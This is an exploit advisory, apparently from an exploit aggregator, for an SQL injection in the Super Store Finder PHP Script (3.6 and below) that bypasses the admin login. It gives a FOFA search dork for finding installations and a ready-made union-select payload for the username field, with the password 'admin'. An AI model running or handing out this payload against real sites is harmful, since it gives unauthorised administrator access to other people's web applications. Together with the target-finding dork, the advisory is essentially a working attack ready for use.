## https://sploitus.com/exploit?id=1337DAY-ID-38848
#Title : Super Store Finder PHP Script SQL Injection / Bypass admin login
#Researcher : Etharus
#Vendor : Joe Iz, https://superstorefinder.net/
#Script Demo Url : https://superstorefinder.net/products/superstorefinder/
#Version Affected : 3.6 and below
#Date : 5 July 2023
#FOFA Dork : "designed and built by Joe Iz."
# Step 1 : Go to admin login, eg: http://localhost/store-finder/admin/
# Step 2 : Enter following payload
username : ' union select 1,'admin','32ddaaea6874e2d3eab0a9ea6ecbb0d0',4,5,6,7,8,9,10,11-- -
password : admin